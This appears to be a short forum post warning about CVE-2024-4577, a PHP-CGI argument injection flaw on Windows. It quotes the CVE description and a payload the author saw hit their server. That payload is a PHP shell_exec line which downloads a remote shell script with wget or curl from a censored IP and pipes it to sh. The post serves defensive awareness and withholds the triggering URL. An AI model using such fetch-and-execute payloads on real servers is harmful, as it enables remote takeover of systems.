Two comments about this:
- Be aware that it is around, particularly if you actually run PHP.
Description from CVE record dated 9 June:
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use “Best-Fit” behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
(I can see that it says “Windows” but it can’t always be assumed that the bug will never work on Linux. In this particular case it seems as if it could really be Windows-specific.)
- My web server saw an occurrence of this, with the PHP code being
<?php shell_exec("SC=$(wget -O- http://aa.bb.cc.dd/sh || curl http://aa.bb.cc.dd/sh); echo \"\$SC\" | sh -s cve_2024_4577"); echo(md5("Hello CVE-2024-4577")); ?>
(where I’ve censored the IP address from which some dodgy first stage shell script will be downloaded)
So is this black hat and the vulnerability is being exploited in the wild and the hacker has a sense of humour (to point me directly at the correct CVE number)
or is this white hat attempting to locate vulnerable servers and warn them?
I think black hat.
(I’ve chosen not to exhibit the URL that is actually sent to the web server in order to trigger this bug.)
